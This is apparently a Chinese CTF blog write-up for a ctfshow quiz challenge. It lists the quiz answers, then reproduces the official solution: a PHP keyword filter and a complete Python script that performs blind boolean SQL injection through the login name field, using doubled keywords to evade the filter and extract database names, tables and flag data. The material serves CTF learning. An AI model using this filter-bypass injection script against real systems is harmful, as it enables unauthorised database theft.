ctfshow-CTF知识问答
sql注入题!
注入位置是在登陆的 姓名处注入!
题目答案:竟然不是做对题目然后出flag!
1.CTF(Capture The Flag)起源于以下哪项赛事? A
A.DEFCON CTF
B.CJB CTF
C.XCTF
D.S3C CTF
2.CTF不包含以下哪种⽐赛模式? D
A.解题模式
B.攻防模式
C.混合模式
D.渗透模式
3.以下主要⽤于加密机制的协议是? C
A.HTTP
B.FTP
C.SSL
D.TELNET
4.故意制作/传播计算机病毒等破坏性程序,影响计算机系统正常运⾏,后果严重的将收到什么处
罚? B
A.⼀个⽉以下拘留
B.五年以下有期徒刑或拘役
C.警告并罚款
D.死刑
5.IP地址块222.21.123.189/13的⼦⽹掩码可写为以下哪种形式? C
A.255.255.255.0
B.255.224.0.0
C.255.248.0.0
D.255.240.0.0
6.输出关于PHP配置的信息函数名是什么?
phpinfo
7.截⽌2021年5⽉ 31⽇, RFC最新的⽂档编号是多少?
9038
8.RSA密码中的'S'代表什么?
Shamir
9.(判断题)ROP是寄存器。
错
10.ORW是指'Over-Range-Write'。
错
以下为官方wp,目前还无法复现,等有机会,可以复现的时候在进行尝试,目前先理解payload,官方说会写规则的话可以使用sqlmap,所以还要加强学习!
过滤语句:
$username = preg_replace('/union|select|flag|in|or|on|where|and|-|=|
|like/i', "", $_POST['username']);
Payload:
'''
-*- coding: utf-8 -*-
@File: exp.py
@Author: gyy
@Time: 3⽉ 13, 2021
'''
import requests
import time
url = "http://127.0.0.1:51415/"
requests.post(url=url+"/register.php",
data={
"username" : "1",
"studentid" : "1",
"submit" : "提交"
})
def req(payload):
requests.get(url=url+"/logout.php")
payload = payload.replace(" ", "/**/")
print(payload)
data = {
"username" : payload,
"studentid" : "1",
"submit" : "提交"
}
res = requests.post(url=url+"/login.php", data=data)
if "错误" in res.text:
return -1
else:
return 1
def binary_search(payload,url): #⼆分法~
#payload = payload.replace("=",">=")
high = 128
low = 1
while True:
time.sleep(0.05)
if (high - low) < 4:
for mid in range(low, high + 1):
time.sleep(0.05)
if req(payload % mid) == -1:
return mid
return -1
mid = (high + low) // 2
pd = payload % mid
if req(pd) == 1:
low = mid + 1
else:
high = mid
def version():
resultstr = ""
for i in range(1,100):
payload = "1'anandd if(ascii(substr(versioonn(),
{},1))>%d,1,0)lilikeke 1#".format(i)
# 1'and/**/if(ascii(substr(version(),1,1))>64,1,1)like/**/1#
j = binary_search(payload, url)
if j > 10:
resultstr = resultstr + chr(j)
print(resultstr)
else:
break
resultstr = "version==========>"+resultstr
print(resultstr)
def database():
resultstr = ""
for i in range(1,100):
payload = "1'anandd if(ascii(substr((selselectect
group_coonncat(schema_name) from iinnfoorrmatioonn_schema.schemata),
{},1))>%d,1,0)lilikeke 1#".format(i)
j = binary_search(payload, url)
if j > 10:
resultstr = resultstr + chr(j)
print(resultstr)
else:
break
resultstr = "databases==========>"+resultstr
print(resultstr)
def table():
resultstr = ""
for i in range(1,10000):
payload = "1'anandd if(ascii(substr((selselectect
group_coonncat(table_name) from iinnfoorrmatioonn_schema.tables
whwhereere(table_schema)lilikeke('scoorre')),{},1))>%d,1,0)lilikeke
1#".format(i)
j = binary_search(payload,url)
if j > 10:
resultstr = resultstr + chr(j)
print(resultstr)
else:
break
resultstr = "tables==========>"+resultstr
print(resultstr)
def columns():
resultstr = ""
for i in range(1,10000):
payload = "1'anandd
if(ascii(substr((selselectect(group_coonncat(column_name))from(iinnfoorr
matioonn_schema.columns)whwhereere(table_name)lilikeke('ctf')),
{},1))>%d,1,0)lilikeke 1#".format(i)
j = binary_search(payload,url)
if j > 10:
resultstr = resultstr + chr(j)
print(resultstr)
else:
break
resultstr = "columns==========>"+resultstr
print(resultstr)
def data():
resultstr = ""
for i in range(1,10000):
payload = "1'anandd
if(ascii(substr((selselectect(group_coonncat(value))from(ctf)),
{},1))>%d,1,0)lilikeke 1#".format(i)
j = binary_search(payload,url)
if j > 10:
resultstr = resultstr + chr(j)
print(resultstr)
else:
break
resultstr = "data==========>"+resultstr
print(resultstr)
if __name__ == "__main__":
version()
database()
table()
columns()
data()
浙公网安备 33010602011771号